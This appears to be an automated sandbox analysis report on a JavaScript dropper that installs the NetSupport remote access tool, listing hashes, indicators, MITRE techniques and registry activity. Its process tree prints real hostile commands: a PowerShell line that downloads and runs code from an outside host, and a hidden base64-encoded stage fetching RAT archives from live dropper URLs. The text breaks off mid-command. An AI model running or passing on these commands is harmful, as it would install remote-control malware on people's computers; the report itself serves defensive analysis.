netsupport | e7c06a549443b1aea924e62326edeb1ac4ee80699f5bc23024b1207ed5bece39

Resubmissions

24/01/2024, 05:16

240124-fx5btsbdhn 10

23/01/2024, 11:06

240123-m7vcyaadf4 10

Analysis

max time kernel
474s
max time network
491s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
23/01/2024, 11:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EU6696.js
Size

28KB
MD5

9139b9c125a6a7fc50a5ba03283a37c3
SHA1

57299b0ccb2df30a8a46ca74c81039bd9f70f4c6
SHA256

bf309c56f147c8f73024569246dc6d38f912c93e5a0cbe2c688115dc332c2182
SHA512

229a25e890ad0fcd80ab505f78712de711f5c54c7814261ce7833dab5caea90737fc5edaea32e8c4637386561b7cd15408e666fac6fec51da63d6b66fa927db0
SSDEEP

768:IP3NoKEb1WFmkEVbUvxaP0EbMVeukFA0QmHal12Kyax53oAatZunzBc8mQP/QJn3:ttsBc8mQP/kqa3oc

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://hsdiagnostico.com/readme.php

Extracted

Language

ps1

Source

URLs

exe.dropper

https://core-click.net/TVFrontend/NSM.zip

exe.dropper

https://core-click.net/TVFrontend/remcmdstub.zip

exe.dropper

https://core-click.net/TVFrontend/DLAA1view.zip

exe.dropper

https://core-click.net/TVFrontend/mock/

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 2 IoCs

flow	pid	Process
17	4784	powershell.exe
69	4852	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	CScript.exe

Executes dropped EXE 2 IoCs

pid	Process
1768	client32.exe
2372	client32.exe

Loads dropped DLL 9 IoCs

pid	Process
1768	client32.exe
1768	client32.exe
1768	client32.exe
1768	client32.exe
1768	client32.exe
2372	client32.exe
2372	client32.exe
2372	client32.exe
2372	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aragdrts = "C:\\Users\\Admin\\AppData\\Roaming\\aragdrts\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133504823952622660"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "10"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000005c425dcd492fda014a57dc624f2fda01d76aef1eee4dda0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "9"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
4932	Notepad.exe
5048	Notepad.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4784	powershell.exe
4784	powershell.exe
960	powershell.exe
960	powershell.exe
4852	powershell.exe
4852	powershell.exe
5000	powershell.exe
5000	powershell.exe
3556	chrome.exe
3556	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeSecurityPrivilege	1768	client32.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe
Token: SeCreatePagefilePrivilege	3556	chrome.exe
Token: SeShutdownPrivilege	3556	chrome.exe

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
1768	client32.exe
1768	client32.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3000	chrome.exe
3000	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3556	chrome.exe
3000	chrome.exe
3000	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5112	chrome.exe
1740	chrome.exe
3000	chrome.exe
4740	chrome.exe
848	chrome.exe
1032	chrome.exe
548	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2116 wrote to memory of 4784	2116	wscript.exe	92
PID 2116 wrote to memory of 4784	2116	wscript.exe	92
PID 4784 wrote to memory of 960	4784	powershell.exe	95
PID 4784 wrote to memory of 960	4784	powershell.exe	95
PID 960 wrote to memory of 1768	960	powershell.exe	100
PID 960 wrote to memory of 1768	960	powershell.exe	100
PID 960 wrote to memory of 1768	960	powershell.exe	100
PID 2408 wrote to memory of 4852	2408	CScript.exe	108
PID 2408 wrote to memory of 4852	2408	CScript.exe	108
PID 4852 wrote to memory of 5000	4852	powershell.exe	110
PID 4852 wrote to memory of 5000	4852	powershell.exe	110
PID 3556 wrote to memory of 4448	3556	chrome.exe	114
PID 3556 wrote to memory of 4448	3556	chrome.exe	114
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4576	3556	chrome.exe	116
PID 3556 wrote to memory of 4936	3556	chrome.exe	117
PID 3556 wrote to memory of 4936	3556	chrome.exe	117
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118
PID 3556 wrote to memory of 544	3556	chrome.exe	118

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\EU6696.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hsdiagnostico.com/readme.php')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noPROFi -ExECutionpoL ByPass -w hidd -E JAA5AE4AUQB4AFQAPQAnAEgASQBaAEwATQBJAC4AegBpAHAAJwA7ACAAYwBoAEQASQByACAAJABlAE4AVgA6AGEAcABwAEQAYQB0AEEAOwAgACQAcQBnAEoASAA3AD0AZwBFAFQALQBjAG8AbQBNAEEATgBEACAARQBYAHAAYQBOAGQALQBhAFIAYwBIAEkAdgBFACAALQBlAFIAUgBPAFIAYQBjAFQAaQBPAG4AIABzAGkATABFAE4AVABMAHkAYwBvAG4AdABJAE4AVQBFADsAIAAkAEsANAB1AEEATQA9ACcAWABpADgANQAxADcAOQAuAHoAaQBwACcAOwAgAFsAbgBFAHQALgBzAGUAUgB2AEkAQwBlAHAATwBJAE4AdABtAEEAbgBhAEcARQBSAF0AOgA6AHMARQBDAFUAUgBJAFQAeQBQAFIAbwBUAE8AYwBvAGwAIAA9ACAAWwBuAEUAdAAuAHMARQBjAFUAcgBpAFQAeQBQAHIAbwBUAE8AYwBPAGwAdABZAHAARQBdADoAOgB0AEwAUwAxADIAOwAgACQASABuAGcAZgBEAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAE4AUwBNAC4AegBpAHAAJwA7ACAAJABKAEMANQBSAHoANQBOAFMAPQBnAEMATQAgAFMAVABBAFIAdAAtAGIASQBUAFMAdABSAGEAbgBTAGYARQByACAALQBFAHIAcgBvAFIAQQBDAFQASQBPAG4AIABzAGkATABlAE4AdABMAHkAQwBvAG4AdABJAE4AVQBFADsAIAAkAEgAcABvAHkATQA9ACcAYQByAGEAZwBkAHIAdABzACcAOwAgACQAUQBkAEkANABwAEEAOABZAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAHIAZQBtAGMAbQBkAHMAdAB1AGIALgB6AGkAcAAnADsAIAAkAHkAMQBsAEkANwBQAGkATgA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBEAEwAQQBBADEAdgBpAGUAdwAuAHoAaQBwACcAOwAgACQASgBhAGcAaABPAD0AJwBiAFQAUwBmAFEAVgBoAC4AegBpAHAAJwA7ACAAJABmAEoAQQBSAGgAVABmAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBhAFAAcABEAGEAdABhACwAIAAkAEsANAB1AEEATQA7ACAAJABHAFEAVQBTADQARABoAHEAPQAkAEUAbgB2ADoAYQBQAHAARABBAHQAQQArACcAXAAnACsAJABKAGEAZwBoAE8AOwAgACQAcgA4AGsAegBRADMAZQBqAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAEUAbgBWADoAQQBwAHAAZABhAFQAYQAsACAAJAA5AE4AUQB4AFQAOwAgACQAdQBzAHMASABXAHIAPQAnAEIASQBUAFMAYQBEAE0ASQBOAC4AR